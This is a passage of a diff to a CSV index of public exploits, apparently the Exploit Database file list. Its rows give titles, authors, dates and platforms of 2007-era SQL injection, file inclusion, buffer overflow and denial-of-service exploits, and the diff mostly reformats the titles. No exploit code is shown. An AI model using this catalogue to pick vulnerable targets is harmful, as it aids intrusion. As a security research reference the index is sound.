Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 -4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit",2007-08-28,irvian,php,webapps,0 +4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 - / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 +4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - (revert-content.php) Remote SQL Injection",2007-08-28,"not sec group",php,webapps,0 +4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - (aid/catid) Remote SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 +4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - (viewitem.php ItemID) Blind SQL Injection Exploit",2007-08-28,irvian,php,webapps,0 4332,platforms/php/webapps/4332.txt,"VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan <= 4.2.0 - (mvcw_conver.php) RFI",2007-08-28,DNX,php,webapps,0 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 -4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass",2007-08-29,DarkFuneral,php,webapps,0 +4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Permission Bypass",2007-08-29,DarkFuneral,php,webapps,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 -4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0 -4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 (shownews.php id) Remote SQL Injection",2007-08-29,SmOk3,php,webapps,0 -4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0 +4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0 +4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) Remote SQL Injection",2007-08-29,SmOk3,php,webapps,0 +4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion Vulnerabilities",2007-08-29,GoLd_M,php,webapps,0 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS <= 0.4 - Remote File Upload / LFI",2007-08-29,GoLd_M,php,webapps,0 -4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 (id) Remote SQL Injection",2007-08-30,"not sec group",php,webapps,0 -4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 -4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 (pop3) pre-auth Remote Overflow PoC",2007-08-30,rgod,windows,dos,0 +4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - (id) Remote SQL Injection",2007-08-30,"not sec group",php,webapps,0 +4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 +4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) pre-auth Remote Overflow PoC",2007-08-30,rgod,windows,dos,0 4345,platforms/windows/local/4345.c,"Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 4348,platforms/windows/remote/4348.c,"PPStream (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 -4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 +4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 -4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 -4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 -4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 +4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 +4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 +4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - (index.php page) Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 @@ -4028,36 +4028,36 @@ id,file,description,date,author,platform,type,port 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF",2007-09-08,rgod,windows,dos,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - (blanko.preview.php) Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion Vulnerabilities",2007-09-08,"Nice Name Crew",php,webapps,0 -4382,platforms/php/webapps/4382.txt,"phpress 0.2.0 (adisplay.php lang) Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 +4382,platforms/php/webapps/4382.txt,"phpress 0.2.0 - (adisplay.php lang) Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante Remote File Upload",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion Vulnerabilities",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple Remote SQL Injection Vulnerabilities",2007-09-09,k1tk4t,php,webapps,0 -4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 (dwoprn.php f) Remote File Download",2007-09-10,k-one,php,webapps,0 -4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities",2007-09-10,QTRinux,php,webapps,0 +4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - (dwoprn.php f) Remote File Download",2007-09-10,k-one,php,webapps,0 +4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion Vulnerabilities",2007-09-10,QTRinux,php,webapps,0 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) SaveToFile() Inscure Method",2007-09-10,shinnai,windows,remote,0 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 -4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 -4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 +4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 +4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 -4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 +4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress Multiple Versions - Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server Distributed Management Objects BoF Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0Day)",2007-09-12,pdp,multiple,remote,0 -4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection",2007-09-13,Houssamix,php,webapps,0 +4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - (id) Remote SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service Exploit",2007-09-13,vCore,windows,dos,0 -4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 (skill_delete) Remote SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 +4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) Remote SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) RFI",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities",2007-09-14,Dj7xpl,php,webapps,0 -4407,platforms/php/webapps/4407.java,"PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit",2007-09-14,D4real_TeaM,php,webapps,0 -4408,platforms/php/webapps/4408.pl,"JBlog 1.0 (index.php id) Remote SQL Injection Exploit",2007-09-14,s4mi,php,webapps,0 +4407,platforms/php/webapps/4407.java,"PHP Webquest <= 2.5 - (id_actividad) Remote SQL Injection Exploit",2007-09-14,D4real_TeaM,php,webapps,0 +4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) Remote SQL Injection Exploit",2007-09-14,s4mi,php,webapps,0 4409,platforms/windows/dos/4409.html,"HP ActiveX (hpqutil.dll ListFiles hpqutil.dll) Remote Heap Overflow PoC",2007-09-14,GOODFELLAS,windows,dos,0 4410,platforms/php/webapps/4410.php,"Gelato (index.php post) Remote SQL Injection Exploit",2007-09-14,s0cratex,php,webapps,0 -4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 (download.php) Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 -4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 (login.php) Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 +4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - (download.php) Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 +4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - (login.php) Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4415,platforms/php/webapps/4415.txt,"joomla component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps,0 @@ -4078,38 +4078,38 @@ id,file,description,date,author,platform,type,port 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - RFI",2007-09-19,BiNgZa,php,webapps,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X isInstalled.dnsResolve Function Overflow PoC",2007-09-19,"YAG KOHHA",multiple,dos,0 -4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 (userreviews.php abc) Remote SQL Injection Exploit",2007-09-19,str0ke,php,webapps,0 +4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) Remote SQL Injection Exploit",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus <= 1.53 - (phpbb_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip <= 3.0 Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip <= 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 4437,platforms/linux/remote/4437.c,"Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit",2007-09-21,axis,windows,remote,25 -4439,platforms/php/webapps/4439.txt,"neuron news 1.0 (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 +4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla Component com_slideshow Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 4441,platforms/php/webapps/4441.txt,"izicontents <= rc6 - (RFI/LFI) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 -4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 (cat_id) Remote SQL Injection",2007-09-22,IHTeam,php,webapps,0 -4444,platforms/php/webapps/4444.txt,"Black Lily 2007 (products.php class) Remote SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 +4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 - (cat_id) Remote SQL Injection",2007-09-22,IHTeam,php,webapps,0 +4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - (products.php class) Remote SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object (emprint.DLL 6.0.1.0) BoF Exploit",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - LFI",2007-09-23,"BorN To K!LL",php,webapps,0 -4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 (show.php file) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 +4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php file) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - Remote SQL Injection",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 -4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 +4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 -4458,platforms/asp/webapps/4458.txt,"Novus 1.0 (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0 +4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 -4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 -4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 +4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 +4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 -4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 +4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager <= 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - Remote SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 @@ -4117,7 +4117,7 @@ id,file,description,date,author,platform,type,port 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads <= 1.5 - Remote SQL Injection",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Include",2007-09-29,bd0rk,php,webapps,0 4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 -4472,platforms/php/webapps/4472.txt,"actSite 1.56 (news.php) Local File Inclusion",2007-10-01,DNX,php,webapps,0 +4472,platforms/php/webapps/4472.txt,"actSite 1.56 - (news.php) Local File Inclusion",2007-10-01,DNX,php,webapps,0 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta (base.php) Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4474,platforms/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 FtpDownloadFile() Remote BoF",2007-10-01,shinnai,windows,dos,0 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x SQL Injection Exploit",2007-10-01,Matrix86,php,webapps,0 @@ -4126,9 +4126,9 @@ id,file,description,date,author,platform,type,port 4478,platforms/linux/remote/4478.c,"smbftpd 0.96 SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD CreateNewFile Arbitrary Remote Rewrite DoS",2007-10-01,rgod,windows,dos,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Remote Blind SQL Injection Exploit",2007-10-02,k1tk4t,php,webapps,0 -4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 +4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - Remote SQL Injection",2007-10-04,bius,php,webapps,0 -4483,platforms/php/webapps/4483.txt,"Ossigeno CMS <= 2.2a3 (footer.php) Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 +4483,platforms/php/webapps/4483.txt,"Ossigeno CMS <= 2.2a3 - (footer.php) Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - (HELP) Remote Buffer Overflow Exploit",2007-10-04,weak,windows,remote,0 4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS <= 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog Remote SQL Injection",2007-10-05,CyberGhost,asp,webapps,0 @@ -4143,7 +4143,7 @@ id,file,description,date,author,platform,type,port 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS (aural.php) Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component - RFI",2007-10-07,"Mehmet Ince",php,webapps,0 4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 -4498,platforms/windows/dos/4498.pl,"wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 +4498,platforms/windows/dos/4498.pl,"wzdftpd <= 0.8.0 - (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0 @@ -4174,22 +4174,22 @@ id,file,description,date,author,platform,type,port 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 -4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 +4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 - (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 -4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 +4531,platforms/windows/local/4531.py,"jetAudio 7.x - (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 -4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 +4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 - (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,143 4535,platforms/linux/dos/4535.pl,"eXtremail <= 2.1.1 - Remote Heap Overflow PoC",2007-10-15,mu-b,linux,dos,0 -4536,platforms/php/webapps/4536.txt,"doop CMS <= 1.3.7 (page) Local File Inclusion",2007-10-15,vladii,php,webapps,0 +4536,platforms/php/webapps/4536.txt,"doop CMS <= 1.3.7 - (page) Local File Inclusion",2007-10-15,vladii,php,webapps,0 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow Exploit",2005-05-03,greuff,linux,remote,0 -4538,platforms/php/webapps/4538.txt,"Artmedic CMS <= 3.4 (index.php page) Local File Inclusion",2007-10-16,iNs,php,webapps,0 +4538,platforms/php/webapps/4538.txt,"Artmedic CMS <= 3.4 - (index.php page) Local File Inclusion",2007-10-16,iNs,php,webapps,0 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - Remote SQL Injection",2007-10-16,dumenci,php,webapps,0 4540,platforms/multiple/dos/4540.pl,"GCALDaemon <= 1.0-beta13 - Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow Exploit",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 HTTP Basic Authentication Bypass Exploit",2007-10-16,ikki,linux,remote,0 -4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 (djpage.php page) Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 -4544,platforms/php/webapps/4544.txt,"LimeSurvey <= 1.52 (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 +4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - (djpage.php page) Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 +4544,platforms/php/webapps/4544.txt,"LimeSurvey <= 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 4545,platforms/php/webapps/4545.txt,"awzMB <= 4.2 beta 1 - Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 4546,platforms/php/webapps/4546.txt,"ZZ FlashChat <= 3.1 - (help.php) Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,"Michael Brooks",php,webapps,0 @@ -4223,17 +4223,17 @@ id,file,description,date,author,platform,type,port 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 -4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 -4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 -4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 (dl.php file) Remote File 